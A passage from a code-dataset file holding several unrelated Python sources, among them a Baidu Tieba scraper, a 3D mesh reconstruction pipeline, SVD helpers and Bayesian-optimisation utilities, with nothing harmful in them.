scalar\n else:\n out[name] = res\n\n return out.reset_index(drop = True)\n\n\n@fast_summarize.register(object)\ndef _fast_summarize_default(__data, **kwargs):\n # TODO: had to register object second, since singledispatch2 sets object dispatch\n # to be a pipe (e.g. unknown types become a pipe by default)\n # by default dispatch to regular mutate\n f = summarize.registry[type(__data)]\n return f(__data, **kwargs)\n\n","sub_path":"siuba/experimental/pd_groups/dialect.py","file_name":"dialect.py","file_ext":"py","file_size_in_byte":7113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"506533827","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n' 爬虫练习百度贴吧 '\n\n__author__ = 'shijiawei'\n\nimport urllib.request\nimport urllib\nimport http.cookiejar\nimport re\nfrom pachongTool import pcTool\n\nclass BDTB:\n def __init__(self,url,seelz):\n self.url=url\n self.seelz=\"?see_lz=\"+str(seelz)\n self.pctool=pcTool()\n\n def getPage(self,pageNum):\n try:\n url=self.url+self.seelz+\"&pn=\"+str(pageNum)\n request=urllib.request.Request(url)\n response=urllib.request.urlopen(request)\n return response.read().decode(\"utf-8\")\n except urllib.request.URLError as e:\n if hasattr(e,\"reason\"):\n print(\"连接百度贴吧失败\"+e.reason)\n return None\n\n def getTiebaName(self, pageresult):\n page = pageresult\n patten = re.compile('(.*?)_(.*?)_百度贴吧', re.S)\n result = re.search(patten, page)\n if result:\n return result.group(2).strip()\n else:\n return None\n\n def getTitle(self,pageresult):\n page=pageresult\n patten=re.compile('(.*?)_(.*?)_百度贴吧',re.S)\n result=re.search(patten,page)\n if result:\n return result.group(1).strip()\n else:\n return None\n def getAllNum(self,pageresult):\n page=pageresult\n patten=re.compile('共(.*?)页',re.S)\n result=re.search(patten,page)\n if result:\n return result.group(1).strip()\n else:\n return None\n\n def printContent(self,pageresult):\n page=pageresult\n patten=re.compile('"date":"(.*?)".*?"post_no":(.*?),".*?
      (.*?)
      ',re.S)\n results=re.findall(patten,page)\n for result in results:\n print(\"\\n\")\n print(result[1] + \"楼 \")\n print(\"时间 \"+result[0]+\" \")\n print(self.pctool.replace(result[2]))\n\n\n\nURL=\"http://tieba.baidu.com/p/3138733512\"\nURL2=\"http://tieba.baidu.com/p/4723966685\"\n#第二个参数 0:查看全部楼层 1:只看楼主\nbdtb=BDTB(URL2,0)\nresult=bdtb.getPage(1)\n# print(result)\nprint(\"贴吧名称: \"+bdtb.getTiebaName(result))\nprint(\"标题是: \"+bdtb.getTitle(result))\nprint(\"总共页数: \"+bdtb.getAllNum(result))\nbdtb.printContent(result)","sub_path":"tieba_pachong.py","file_name":"tieba_pachong.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"327334085","text":"#parallel preprocess scan data\n#automatically download image data and preprocess them\n\nimport os\nimport subprocess\nimport logging\nimport shutil\nimport time\n\nimport numpy as np\nimport logging\nimport trimesh\nfrom datetime import datetime\n\ndef obj2ply(objFile, plyFile):\n mesh = trimesh.load(objFile,process=None)\n mesh.export(plyFile,\"ply\",encoding='ascii',vertex_normal=True)\n # mesh = pymesh.load_mesh(objFile)\n # pymesh.save_mesh(plyFile, mesh, ascii=True)\n return\n\ndef ply2obj(plyFile, objFile):\n mesh = trimesh.load(plyFile,process=None,vertex_normal=True)\n print(len(mesh.vertex_normals))\n mesh.export(objFile)\n return\n\ndef rmBadFace(objFile,objRFile):\n mesh = trimesh.load(objFile)\n mesh.remove_degenerate_faces()\n mesh.export(objRFile)\n\ndef _logpath(path, names):\n print('Working in %s' % path)\n return [] # nothing will be ignored\n\nif __name__ == \"__main__\":\n\n ImageMagicPath = r\"C:/Program Files/ImageMagick-7.0.8-Q16-HDRI\"\n BUILD_ROOT = r\"D:\\v-jiazha\\2-workspaces\\Source\\ObjectCap\\x64\\Release\"\n TOOL_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\2-3rdTool\"\n DATA_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\4-MVS\"\n DATA_ROOT_E = r\"E:\\v-jiazha\\4-projects\\5-LED\\2-Source\\4-MVS\"\n TOOL_LCT_ROOT = r\"D:\\v-jiazha\\4-projects\\5-LED\\2-Source\\2-3rdTool\\LCT\"\n COMMON_ROOT = os.path.join(DATA_ROOT, r'RealCommon')\n CONFIG_ROOT = os.path.join(COMMON_ROOT,r\"Config0301\")\n\n\n logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger = logging.getLogger(__name__)\n\n v_size = 184\n u_size = 224\n nTotal = 409\n\n # Option Setting\n # positionStr = r\"0.1982,-0.0921,0\"\n positionStr = r\"0.1988,-0.09269,0\"\n nViewsCount = 36\n nViews = \"36\"\n # Bases Setting\n generics = \"20\"\n genericStart = \"0.01\"\n genericEnd = \"0.60\"\n genericRoughnesses = \"0.01,0.02,0.04,0.07,0.09,0.11,0.13,0.16,0.20,0.25,0.40\"\n # genericRoughnesses = \"0.01,0.02,0.03,0.05,0.07,0.09,0.11,0.13,0.16,0.20,0.25\"\n\n # Downsampled lights\n rowScanWidth = \"7\"\n rowScanHeight = \"1\"\n colScanWidth = \"1\"\n colScanHeight = \"23\"\n\n # OBJECT_MERGE = r\"RealObject-cookiesMerge\"\n # OBJECT_MERGE = r\"RealObject-oatmealMerge\"\n OBJECT_MERGE = r\"RealObject-giftMerge\"\n OBJECT_ROOT_MERGE = os.path.join(DATA_ROOT, r'Object',OBJECT_MERGE)\n OBJECT_Model_Dir_MERGE = os.path.join(OBJECT_ROOT_MERGE, \"Recover\", \"Model\",\"FinalSfM\")\n\n # OBJECT1 = r\"RealObject-oatmeal\"\n OBJECT1 = r\"RealObject-gift1\"\n OBJECT_ROOT1 = os.path.join(DATA_ROOT_E, r'Object',OBJECT1)\n OBJECT_ViewDir1 = os.path.join(OBJECT_ROOT1, \"Views\", \"View_%04d\")\n OBJECT_Model_Dir1 = os.path.join(OBJECT_ROOT1, \"Recover\", \"Model\",\"FinalOpt\")\n\n # OBJECT2 = r\"RealObject-oatmeal2\"\n OBJECT2 = r\"RealObject-gift2\"\n OBJECT_ROOT2 = os.path.join(DATA_ROOT, r'Object',OBJECT2)\n OBJECT_ViewDir2 = os.path.join(OBJECT_ROOT2, \"Views\", \"View_%04d\")\n OBJECT_Model_Dir2 = os.path.join(OBJECT_ROOT2, \"Recover\", \"Model\",\"FinalOpt\")\n\n # Setup setting: camera,\n cameraConfig1 = os.path.join(CONFIG_ROOT, \"Setup\" + OBJECT1, \"cameraConfig.txt\")\n cameraConfig2 = os.path.join(CONFIG_ROOT, \"Setup\" + OBJECT2, \"cameraConfig.txt\")\n\n # Camera extrinsic, scale setting\n viewScale = \"0.009\"\n # viewScale = \"1\"\n # cameraExtrinDirectory1 = os.path.join(OBJECT_ROOT1, \"ColmapSfM\", \"Extrinsic\")\n # cameraExtrinDirectory2 = os.path.join(OBJECT_ROOT2, \"ColmapSfM\", \"Extrinsic\")\n cameraExtrinDirectory1 = os.path.join(OBJECT_ROOT1, \"CalibPrism\", \"Extrinsic\")\n cameraExtrinDirectory2 = os.path.join(OBJECT_ROOT2, \"CalibPrism\", \"Extrinsic\")\n\n # keyPointsUVFile1 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsUV1.txt\")\n # keyPointsUVFile2 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsUV2.txt\")\n keyPointsUVFile1 = os.path.join(OBJECT_Model_Dir1,\"keyPointsUV.txt\")\n keyPointsUVFile2 = os.path.join(OBJECT_Model_Dir2,\"keyPointsUV.txt\")\n keyPointsPosFile1 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsPos1.txt\")\n keyPointsPosFile2 = os.path.join(OBJECT_Model_Dir_MERGE,\"keyPointsPos2.txt\")\n\n # tranform second point cloud into the first one\n transExtrinFile = os.path.join(OBJECT_Model_Dir_MERGE,\"transExtrin.txt\")\n # transExtrinFile = os.path.join(OBJECT_Model_Dir_MERGE,\"transExtrinIdentity.txt\")\n # refine normal MVS setting\n nrmRefRecDirName1 = \"refineNrBasesIter(WithTH)_rgbWeight=1_nrmWeight=10_dptWeight=10_fDistTH=1_nDptIters=2\"\n nrmRefRecDirName2 = \"refineNrBasesIter(WithTH)_rgbWeight=1_nrmWeight=10_dptWeight=10_fDistTH=1_nDptIters=2\"\n\n src1Model = os.path.join(OBJECT_ROOT1,\"Recover/Model/NrmRefine\",nrmRefRecDirName1,\"Comb_refine_.obj\")\n src2Model = os.path.join(OBJECT_ROOT2,\"Recover/Model/NrmRefine\",nrmRefRecDirName2,\"Comb_refine_.obj\")\n # src1Model = os.path.join(OBJECT_Model_Dir1,\"RecoverUpdate.obj\")\n # src2Model = os.path.join(OBJECT_Model_Dir2,\"RecoverUpdate.obj\")\n\n # alignColmapModel = os.path.join(OBJECT_Model_Dir_MERGE,\"fused.obj\")\n alignModel = os.path.join(OBJECT_Model_Dir_MERGE,\"AlignPoindCloud.obj\")\n # alignModel = os.path.join(OBJECT_Model_Dir_MERGE,\"fusedFlip.obj\")\n alignModelPly = os.path.join(OBJECT_Model_Dir_MERGE,\"AlignPoindCloud.ply\")\n # alignModelPly = os.path.join(OBJECT_Model_Dir_MERGE,\"fusedFlip.ply\")\n alignModelPoi = os.path.join(OBJECT_Model_Dir_MERGE,\"Align_Poi.ply\")\n alignModelTrim = os.path.join(OBJECT_Model_Dir_MERGE,\"Align_Trim.ply\")\n alignModelRec = os.path.join(OBJECT_Model_Dir_MERGE,\"Recover_clean.obj\")\n meshFinalDirObj = os.path.join(OBJECT_Model_Dir_MERGE,\"RecoverFinal_clean.obj\")\n\n # Colmap Setting\n OBJECT_ROOT_MERGE_SFM = os.path.join(OBJECT_ROOT_MERGE, r'SfMFromPrism')\n OBJECT_COLMAP_ROOT = os.path.join(OBJECT_ROOT_MERGE_SFM, \"SfM_FIRST_OBJECT\")\n colmap_sparse_model_dir = os.path.join(OBJECT_COLMAP_ROOT, \"sparse\", \"model\")\n colmap_sparse_modelUpt_dir = os.path.join(OBJECT_COLMAP_ROOT, \"sparse\", \"modelUpt\", \"vocab-tree.bin\")\n imageListFile = os.path.join(colmap_sparse_modelUpt_dir, 'images.txt')\n\n # Option setting\n CapAlignPointCloudOpt = 0\n CleanPointCloudOption = 1\n logger.info(\"Start merging objects:\")\n if not os.path.exists( OBJECT_Model_Dir_MERGE):\n os.makedirs( OBJECT_Model_Dir_MERGE)\n _environ = dict(os.environ)\n try:\n if 'PATH' in _environ:\n os.environ['PATH'] = os.environ['PATH'] + \";\" + BUILD_ROOT + \";\" + TOOL_ROOT + \";\" + TOOL_LCT_ROOT\n else:\n os.environ['PATH'] = BUILD_ROOT + \";\" + TOOL_ROOT + \";\" + TOOL_LCT_ROOT\n\n if CapAlignPointCloudOpt:\n logger.info(\"Combine point clouds: \")\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n\n selectCameraExtrinsic1 = cameraExtrinsic1 % 23\n selectCameraExtrinsic2 = cameraExtrinsic2 % 8\n re = subprocess.run(\n [\"CapTwoSeqTrans\", \"-src1ModelFile=\" + src1Model, \"-src2ModelFile=\" + src2Model,\n \"-tarModelFile=\" + alignModel,\n \"-cameraExtrin1=\" + selectCameraExtrinsic1,\n \"-cameraExtrin2=\" + selectCameraExtrinsic2,\n \"-transExtrin=\" + transExtrinFile,\n \"-imageListFile=\" + imageListFile,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n # # from ColMap: model need to be flipped\n # re = subprocess.run(\n # [\"ModelConvert.exe\", \"-srcModelFile=\" + alignColmapModel, \"-tarModelFile=\" + alignModel, \"-flipZ\", \"-flipY\"],\n # stdout=True, stderr=True, check=True)\n obj2ply(alignModel, alignModelPly)\n logger.info(\"PoissonRecon: \")\n re = subprocess.run(\n [\"PoissonRecon.exe\", \"--in\", alignModelPly, \"--out\", alignModelPoi, \"--normals\", \"--pointWeight\",\n \"0\",\n \"--depth\",\n \"10\", \"--density\", \"--threads\",\"16\"], stdout=True, stderr=True,\n check=True)\n # trim combined mesh\n re = subprocess.run(\n [\"SurfaceTrimmer.exe\", \"--in\", alignModelPoi, \"--out\", alignModelTrim, \"--trim\", \"6\"],\n stdout=True, stderr=True, check=True)\n ply2obj(alignModelTrim,alignModelRec)\n shutil.copy(alignModelRec,meshFinalDirObj)\n\n if CleanPointCloudOption:\n logger.info(\"Clean point cloud \")\n\n CapMultiSimOption = 1\n CapDilateMaskOption = 1\n CapCleanOption = 1\n clean_nIters = 1\n\n # each view: format string\n viewDirectory1 = os.path.join(OBJECT_ROOT1, \"Views\", \"View_%04d\")\n nrmRefineDirectory1 = os.path.join(viewDirectory1, \"Recover/NrmRefine\")\n viewMeshCleanDir1 = os.path.join(nrmRefineDirectory1, \"Iter_Merge_Clean\")\n\n viewDirectory2 = os.path.join(OBJECT_ROOT2, \"Views\", \"View_%04d\")\n nrmRefineDirectory2 = os.path.join(viewDirectory2, \"Recover/NrmRefine\")\n viewMeshCleanDir2 = os.path.join(nrmRefineDirectory2, \"Iter_Merge_Clean\")\n\n # recovered model dir:\n meshFinalDir = OBJECT_Model_Dir_MERGE\n iterDir = os.path.join(meshFinalDir, \"Iter_Merge_Clean\")\n firstRecModel = alignModelRec\n firstCombModel = alignModel\n if not os.path.exists(iterDir):\n os.makedirs(iterDir)\n\n # combined\n for iter in range(clean_nIters):\n logger.info(\"Iter: {} \".format(iter) )\n viewIterDir1 = os.path.join(viewMeshCleanDir1,\"Iter_%04d\" % iter)\n viewIterFramesDir1 = os.path.join(viewIterDir1, \"Frames\")\n viewIterDir2 = os.path.join(viewMeshCleanDir2,\"Iter_%04d\" % iter)\n viewIterFramesDir2 = os.path.join(viewIterDir2, \"Frames\")\n\n cleanModel = os.path.join(iterDir,\"Iter_%04d_clean.obj\")\n cleanModelPly = os.path.join(iterDir, \"Iter_%04d_clean.ply\")\n poissonModel = os.path.join(iterDir,\"Iter_%04d_poi.ply\")\n trimModel = os.path.join(iterDir,\"Iter_%04d_trim.ply\")\n recModel = os.path.join(iterDir,\"Iter_%04d_rec.obj\")\n preModel = recModel % (iter-1)\n preComModel = cleanModel % (iter -1)\n if iter == 0:\n preModel = firstRecModel\n preComModel = firstCombModel\n\n logger.info(\"CapMultiSim \")\n CapMultiSimOption = 1\n if CapMultiSimOption:\n logger.info(\"CapMultiSim first object 1\")\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n renderOption = \"2\"\n re = subprocess.run(\n [\"CapMultiSim\", \"-framesDirectory=\" + viewIterFramesDir1,\n \"-modelFile=\" + preModel,\n \"-cameraConfig=\" + cameraConfig1, \"-cameraExtrin=\" + cameraExtrinsic1,\n \"-viewScale=\" + viewScale, \"-flipZ\",\n \"-renderOption=\" + renderOption, \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n logger.info(\"CapMultiSim first object 2\")\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n renderOption = \"2\"\n re = subprocess.run(\n [\"CapMultiSim\", \"-framesDirectory=\" + viewIterFramesDir2,\n \"-modelFile=\" + preModel,\n \"-cameraConfig=\" + cameraConfig2, \"-cameraExtrin=\" + cameraExtrinsic2,\n # \"-transExtrin=\" + transExtrinFile,\n \"-viewScale=\" + viewScale, \"-flipZ\",\n \"-renderOption=\" + renderOption, \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n logger.info(\"Dilate mask \")\n if CapDilateMaskOption:\n # dilate masks\n for v in range(nViewsCount):\n nDil = \"2\"\n inputFile = os.path.join(viewIterFramesDir1 % v, \"mask.pfm\")\n outputFile = os.path.join(viewIterFramesDir1 % v, \"mask_dil.pfm\")\n re = subprocess.run(\n [\"ImgDilator\", \"-in=\" + inputFile, \"-out=\" + outputFile, \"-n=\"+nDil], stdout=True, stderr=True,\n check=True)\n for v in range(nViewsCount):\n nDil = \"2\"\n inputFile = os.path.join(viewIterFramesDir2 % v, \"mask.pfm\")\n outputFile = os.path.join(viewIterFramesDir2 % v, \"mask_dil.pfm\")\n re = subprocess.run(\n [\"ImgDilator\", \"-in=\" + inputFile, \"-out=\" + outputFile, \"-n=\" + nDil], stdout=True,\n stderr=True,\n check=True)\n\n logger.info(\"Clean outliers \")\n if CapCleanOption:\n cameraExtrinsic1 = os.path.join(cameraExtrinDirectory1, \"view_%04d.txt\")\n viewMaskImgFile1 = os.path.join(viewIterFramesDir1, \"mask_dil.pfm\")\n srcModel = preComModel\n tarModel = cleanModel % iter\n re = subprocess.run(\n [\"CapCleanPointCloud\", \"-cameraConfig=\" + cameraConfig1, \"-cameraExtrin=\" + cameraExtrinsic1,\n \"-viewMaskImgFile=\" + viewMaskImgFile1,\n \"-srcModelFile=\" + srcModel, \"-tarModelFile=\" + tarModel,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n\n cameraExtrinsic2 = os.path.join(cameraExtrinDirectory2, \"view_%04d.txt\")\n viewMaskImgFile2 = os.path.join(viewIterFramesDir2, \"mask_dil.pfm\")\n srcModel = cleanModel % iter\n tarModel = cleanModel % iter\n re = subprocess.run(\n [\"CapCleanPointCloud\", \"-cameraConfig=\" + cameraConfig2, \"-cameraExtrin=\" + cameraExtrinsic2,\n \"-viewMaskImgFile=\" + viewMaskImgFile2,\n \"-srcModelFile=\" + srcModel, \"-tarModelFile=\" + tarModel,\n \"-viewScale=\" + viewScale, \"-flipZ\", \"-nViews=\" + nViews],\n stdout=True, stderr=True, check=True)\n # poisson reconstruct combined mesh\n\n modelInP = cleanModelPly % iter\n modelOutP = poissonModel % iter\n obj2ply(cleanModel % iter,modelInP)\n re = subprocess.run(\n [\"PoissonRecon.exe\", \"--in\", modelInP, \"--out\", modelOutP, \"--normals\",\n \"--pointWeight\", \"0\",\n \"--depth\",\n \"10\", \"--density\", \"--threads\", \"16\", \"--samplesPerNode\", \"5\"], stdout=True,\n stderr=True, check=True)\n # trim combined mesh\n modelInT = modelOutP\n modelOutT = trimModel % iter\n re = subprocess.run(\n [\"SurfaceTrimmer.exe\", \"--in\", modelInT, \"--out\", modelOutT, \"--trim\",\n \"6\"],\n stdout=True, stderr=True, check=True)\n ply2obj(modelOutT, recModel % iter)\n\n\n shutil.copy(recModel % (clean_nIters - 1), meshFinalDirObj)\n\n\n\n\n finally:\n os.environ.clear()\n os.environ.update(_environ)\n\n\n","sub_path":"Script/RMVS/RMVSCapAlignMergeRouPointCloudSfM(36+1).py","file_name":"RMVSCapAlignMergeRouPointCloudSfM(36+1).py","file_ext":"py","file_size_in_byte":15824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"311095428","text":"import csv\n\n\nuser_list = [\n{'first_name':'Anry', 'last_name':'Bolt', 'email':'anry@yandex.ru', 'gender':'male', 'age':'34'},\n{'first_name':'Vilthor', 'last_name':'Simmon', 'email':'si_87@google.com', 'gender':'male', 'age':'39'}\n]\n\nwith open('export.csv', 'w', encoding='utf-8', newline='') as f:\n fields = ['first_name', 'last_name', 'email', 'gender', 'age']\n writer = csv.DictWriter(f, fields, delimiter=';')\n writer.writeheader()\n for user in user_list:\n writer.writerow(user)","sub_path":"export_users.py","file_name":"export_users.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"160211189","text":"import numpy as np\r\nimport igraph as ig\r\n\r\n\r\n\r\ndef get_timeline_matrix(timeline, window):\r\n matrix = []\r\n values = list(timeline.values())\r\n for i in range(0, len(timeline.items())-window):\r\n matrix.append(values[i:i+window])\r\n return np.matrix(matrix)\r\n\r\ndef get_x_house(trajectory_matrix, u_matrix, window):\r\n res = np.zeros((u_matrix.shape[1], trajectory_matrix.shape[1]))\r\n for i in range(0, window):\r\n u_vec=u_matrix[i]\r\n test = u_vec.transpose().dot(trajectory_matrix).reshape(trajectory_matrix.shape[1])\r\n xuy = u_vec.reshape((u_vec.shape[0],1)).dot(test)\r\n res += xuy\r\n return res;\r\n\r\n\r\n\r\ndef hankellize(mat):\r\n l_star = 0\r\n k_star = 0\r\n if mat.shape[0]>mat.shape[1]:\r\n l_star = mat.shape[1]\r\n else:\r\n l_star = mat.shape[0]\r\n\r\n if mat.shape[0]=0 and k<(l_star-1):\r\n for m in range(0, k+1):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/(k+1))*sub_res)\r\n \r\n if (l_star-1)<=k and k<=k_star-1:\r\n for m in range(0, l_star):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/l_star)*sub_res)\r\n if k_star< k and k<= big_n:\r\n for m in range(k-k_star, mat.shape[0]-k_star):\r\n sub_res+=mat[m,k-m]\r\n g.append((1/(big_n-k))*sub_res)\r\n return g;\r\n","sub_path":"SVD_module.py","file_name":"SVD_module.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"336005311","text":"import sys\nfrom moe.optimal_learning.python.data_containers import HistoricalData\nimport numpy as np\nimport pickle\nfrom pickle import dump\nfrom joblib import Parallel, delayed\n\nnp.set_printoptions(threshold=sys.maxint)\n\n# ================================================================================================= #\n# generate initial data #\n# (single IS) #\n# ================================================================================================= #\n\n# --------------------------------------------------------------------------- #\n# load from file #\n# --------------------------------------------------------------------------- #\ndef load_sample_data(problem, num_per_var, exp_path, result_path):\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n with open(result_path+'_initial_samples.pickle', 'rb') as file: \n list_init_pts_value_noise = pickle.load(file)\n new_historical_data = HistoricalData(dim=problem.obj_func_min.getDim())\n count = -1\n repQL = problem.obj_func_min.repQL\n s_min = problem.obj_func_min.getSearchDomain()[0, 0]\n s_max = problem.obj_func_min.getSearchDomain()[0, 1]\n for s in np.linspace(s_min, s_max, num=problem.obj_func_min.getNums()):\n count += 1\n pts_value_noise = list_init_pts_value_noise[count]\n points = pts_value_noise[:, 0:-2]\n vals_array = pts_value_noise[:, -2]\n noise_array = pts_value_noise[:, -1]\n new_historical_data.append_historical_data(points, vals_array, noise_array)\n \n return new_historical_data\n\n# --------------------------------------------------------------------------- #\n# general function for initial data generator #\n# --------------------------------------------------------------------------- #\ndef sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path):\n list_init_pts_value_noise = []\n new_historical_data = HistoricalData(dim=problem.obj_func_min.getDim())\n repQL = problem.obj_func_min.repQL\n s_min = problem.obj_func_min.getSearchDomain()[0, 0]\n s_max = problem.obj_func_min.getSearchDomain()[0, 1]\n for s in np.linspace(s_min, s_max, num=problem.obj_func_min.getNums()):\n random_seeds = np.random.randint(900, size=num_initial_pts_per_s)\n points = np.hstack((s * np.ones(num_initial_pts_per_s).reshape((-1, 1)), points_x))\n\n vals_array, noise_array = np.zeros(num_initial_pts_per_s), np.zeros(num_initial_pts_per_s)\n i = -1\n for (pt,random_seed) in zip(points, random_seeds):\n i += 1\n value, noise_array[i] = problem.obj_func_min.evaluate(repQL, pt, random_seed, exp_path)\n vals_array[i] = -1.0*value\n\n new_historical_data.append_historical_data(points, vals_array, noise_array)\n\n pts_value_noise = np.hstack(( points, vals_array.reshape((-1,1)), noise_array.reshape((-1,1)) ))\n list_init_pts_value_noise.append(pts_value_noise)\n with open(result_path+'_initial_samples.txt', \"w\") as file: \n file.write(str(list_init_pts_value_noise))\n with open(result_path+'_initial_samples.pickle', \"wb\") as file: \n dump(np.array(list_init_pts_value_noise), file)\n # print(list_init_pts_value_noise)\n return new_historical_data\n\n# --------------------------------------------------------------------------- #\n# different constraints on generating initial data #\n# --------------------------------------------------------------------------- #\ndef sample_initial_x_uniform(problem, num_per_var, exp_path, result_path):\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_uniform_x_points_in_domain(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\ndef sample_initial_f1f2_closer_f1_further_f2(problem, num_per_var, exp_path, result_path):\n ''' flag 1 is closer to the start than flag 2 '''\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_closer_f1_further_f2(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\ndef sample_initial_f1f2_higher_f1_lower_f2(problem, num_per_var, exp_path, result_path):\n ''' y(f1) <= y(f2) '''\n # np.random.seed(1)\n var_dim = int(problem.obj_func_min.getDim()) - 1\n num_initial_pts_per_s = int(num_per_var * var_dim)\n points_x = problem.obj_func_min.get_moe_domain().generate_higher_f1_lower_f2(num_initial_pts_per_s)\n new_historical_data = sample_intial_x_general(problem, num_initial_pts_per_s, points_x, exp_path, result_path)\n return new_historical_data\n\n\n\n# ================================================================================================= #\n# select start points #\n# ================================================================================================= #\n\n# --------------------------------------------------------------------------- #\n# general function for selecting start points #\n# --------------------------------------------------------------------------- #\ndef select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n '''\n create starting points for BFGS, first select points from previously sampled points,\n but not more than half of the starting points\n :return: numpy array with starting points for BFGS\n '''\n if len(list_sampled_points) > 0:\n indices_chosen = np.random.choice(len(list_sampled_points), \n int(min(len(list_sampled_points), num_multistart/2.-1.)), \n replace=False)\n start_pts_x = np.array(list_sampled_points)[:,1:][indices_chosen]\n start_pts_x = np.vstack((pt_x_to_start_from, start_pts_x)) # add the point that will be sampled next\n else:\n start_pts_x = [pt_x_to_start_from]\n return start_pts_x\n\n# --------------------------------------------------------------------------- #\n# different constraints on selecting start points #\n# --------------------------------------------------------------------------- #\ndef select_startpts_x_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n # fill up with points from an LHS\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_uniform_x_points_in_domain(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\ndef select_startpts_f1closer_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_closer_f1_further_f2(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\ndef select_startpts_f1higher_BFGS(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem):\n start_pts_x = select_startpts_general(s, list_sampled_points, pt_x_to_start_from, num_multistart, problem)\n random_pts_x = problem.obj_func_min.get_moe_domain().generate_higher_f1_lower_f2(num_multistart-len(start_pts_x))\n start_pts_x = np.vstack((start_pts_x, random_pts_x))\n return start_pts_x\n\n\n\n# ================================================================================================= #\n# process_parallel_results #\n# ================================================================================================= #\ndef process_parallel_results(parallel_results):\n inner_min = np.inf\n for result in parallel_results:\n if inner_min > result[1]:\n inner_min = result[1]\n inner_min_point = result[0]\n return inner_min, inner_min_point","sub_path":"multifidelity_KG_REP/misokg_utils_sep.py","file_name":"misokg_utils_sep.py","file_ext":"py","file_size_in_byte":8765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"320091730","text":"if __name__ != \"__main__\":\n exit(-1)\n\nimport sys, json\nfrom matplotlib import pyplot\n\ntarget = sys.argv[1]\ndata = json.loads(sys.argv[2])\nkws = data['keys']\nno = data['no']\n\nfig, ax = pyplot.subplots()\nax.plot(list(kws.keys()), list(kws.values()))\nax.grid()\nax.set(label=f\"Graph {no}\")\n\nwith open(target, \"wb\") as f:\n fig.savefig(f)\n\npyplot.close(fig)\n","sub_path":"mathparser/_graph.py","file_name":"_graph.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"212141558","text":"import json\n\n\ndef test_basic():\n\n # str => json\n content = '{\"accessToken\": \"521de21161b23988173e6f7f48f9ee96e28\", \"User-Agent\": \"Apache-HttpClient/4.5.2 (Java/1.8.0_131)\"}'\n res = json.loads(content)\n print('res type %s' % type(res))\n print(res)\n\n\n # json => str\n json_content = {\"accessToken\": \"521de21161b23988173e6f7f48f9ee96e28\", \"User-Agent\": \"Apache-HttpClient/4.5.2 (Java/1.8.0_131)\"}\n res_str = json.dumps(json_content)\n\n print('res_str %s' % type(res_str))\n print(res_str)\n\n\n\nif __name__ == '__main__':\n\n test_basic()","sub_path":"Python35/PythonSyntax/objects/test_json.py","file_name":"test_json.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"44715715","text":"from src.utils.dataset import load_dataset\nfrom src.utils.train_model import train_cora_reddit, train_ppi, train_tu, evaluate_tu, evaluate_ppi, evaluate_cora_reddit\nfrom src.utils.train_model import load_parameters\nfrom src.utils.optimize import optimize_graph_cora_reddit_ppi, optimize_graph_tu, optimize_node_cora_reddit_ppi, 